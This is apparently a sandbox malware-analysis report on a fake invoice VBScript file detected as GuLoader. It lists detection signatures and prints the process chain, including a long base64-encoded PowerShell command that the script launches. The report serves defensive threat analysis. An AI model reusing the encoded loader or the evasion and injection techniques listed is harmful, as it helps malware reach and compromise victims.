Edit tour
Windows
Analysis Report
WWVN_INVOICE_8363567453.vbs
Overview
General Information
Detection
GuLoader
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 5560 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\WWVN_ INVOICE_83 63567453.v bs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 6876 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBO AGEAbgBkAG kAbgBtAGUA NQAgAEIAbw BiAGwAZQBr AGEAIABBAH IAdABpAGsA dQBsAGUAcg AgAGgAbwB0 AG0AIABGAG 8AcgBtAG4A aQBuADQAIA BWAGkAZwBl AHMAaQBtAG 8AawBpADYA IABzAHQAbw BtACAARQBj AGgAaQBuAG kAdAA2ACAA cAByAG8Abg BhAHQAaQB2 ACAAUAB5AH IAbwAgAFQA ZQB4AHQAdA B2ADcAIABF AGwAZQB2AG EAdABvAHIA ZgByACAAUg BBAE0AUgBP AEQAUwBBAC AAUQBlAGsA dQByAHMAdQ BzAHMAIABi AGUAYQBuAH AAbwAgAFMA awByAGsAMg AgAHAAbwBs AGEAcgBpAC AAbQBlAGQA ZQBvAGwAYQ AgAEwAbwBy AGEAIABSAG EAcABoAGkA NgAgAA0ACg AjAGQAZQBm AGEAIABwAG kAZQBkACAA VABhAG4AZA BrAGQAcwBi AGUAIABVAG 4AaQBtAG0A bwByACAAQg BhAGQAZwBl AHIAYgA2AC AAZQB4AGMA bAB1AHMAIA BDAGgAbwBu AGQAcgBvAG cAOAAgAEEA RQBSAE8ATA BPACAARgBJ AFMASABFAF IATQBBAE4A SQAgAEYAQQ BHAEkATgBU AEUARwBSAC AASQBuAGMA ZQBwAHQAbw AzACAAUwBu AHUAcgBsAD YAIABCAGkA cwBlAHgAdQ BhACAAZABv AHMAcwBlAH IAIABnAGEA dgBlAGwAIA BtAGUAdABh AGYAbwByAG UAIAB0AHIA YQBuACAAYQ B0AGEAawAg AFMAZQBpAH MAbQBpADIA IABOAG8Abg BmAGEAYgB1 AGwAIABEAG kAZwB0AGUA awAzACAAUg BFAEcATgBT AEsAQQAgAF AAaAB5AHQA bwBtAGUAOQ AgAE0AdQBy AGEAZQAgAE gAYQBsAHYA OAAgAFYATw BDAEkARgBF AFIAQQBUAE UAIABXAE8A TwBEAEMAUg BBAEYAVAAg AGgAYQByAG QAaABlAGEA cgB0ACAASw BuAGkAYgAg AHMAZQBqAH QAIAANAAoA IwBJAG0AbQ BlAHIAdgBr ADgAIABTAH AAcgBvAGcA ZgBsACAAUg BFAEQAUwBI AEkAIABzAG kAZgBmAGwA ZQB1AHMAIA BTAHUAcABl AHIAIAByAG kAZgB0AGUA cgBzACAARw ByAG8AdQBj AGgAIABQAH IAbwBlAHYA ZQB0AGkAIA BQAFIATwBU AEUATgBTAE kAIABMAHkA ZABiAGkAbA BsAGUAZABl ACAAUwBVAE IARQBMAEUA QwBUAFIAIA BSAGEAbQBt AGUAdABjAG gAbwByACAA QwBJAFMAUw BFAFMAQQBS ACAAQgByAG UAZAAgAGoA bwByAGQAZg BzAHQAZQAg AEEAbgB0AG kAcwBlAG4A cwAgAEwATw BYAE8AIAAN AAoAIwBTAH AAbAB1AHIA ZwB5AHAAeQ A3ACAAUwBl AHAAdABlAG 4AIABEAGkA bQBzACAAVA BlAGIAcgBl AHYAcwB1AG 4AYwAyACAA UwB0AHQAdA BlAHAAMgAg AGwAaQBrAH YAaQBkAGUA IABBAGYAdA B2AGkAIABw AGEAbgB0AG 8AZwAgAHYA ZQBqAGIAeQ BnACAAYwBv AGMAbwAgAE kAUwBCAFIA WQAgAFAAQQ BTAFMAIABQ AGkAbgBmAC AAbQB1AG4A aQBrAGEAdA AgAHUAbgBz AGUAIABHAF UATABEAFIA IABNAGUAbA BvAGQAaQBv AHUAIABwAG EAbgBpAG0A ZQB0AGUAIA BSAGEAZgB0 AGUAcwBvAH MAdABlACAA YQB2AGEAbg BjAGUAbQBl AG4AdAAgAE UAbgB0AGUA YQBzAHUAYg BwAHIAIABN AFkAQwBFAC AAVABpAGQA bABuAG4AZQ BkAGUAMwAg AG8AZAB5AH MAcwBlAG4A IABkAHIAeQ BwAHQAcgBy AGUAbgAgAH AAZQByAHMA bwAgAA0ACg AjAGgAbwBy AG4AIABDAG UAbgB0AHIA NAAgAEgAZQ BuAHIAeQBr AGsAZQBzAG wAOAAgAEYA TwBSAEQAQQ BNAFAATgBJ AE4AIABJAG 4AdAByAGEA ZgBvAGwAIA BDAGEAbABk AHIAbwBuAC AAaQBuAGYA cgAgAHYAYQ BsAGcAIABT AEkAUwBZAF IASQAgAEcA ZQBuAG8AYQ BrAG8AIABz AGsAYQBkAG UAZwByAGUA cgAgAFUAbg BkAGUAcgBh AGYAcwBuAG kAMgAgAFYA YQBjAGMAaQ BuAGEAdAAg AGQAcgBpAG wAbABlAHIA aQBlAHIAIA BDAEgAQQBJ ACAADQAKAC MARABlAHQA bwB4AGkAZg AgAGEAZgBt AGEAbABpAC AASABtAG0A ZQB0AG4AIA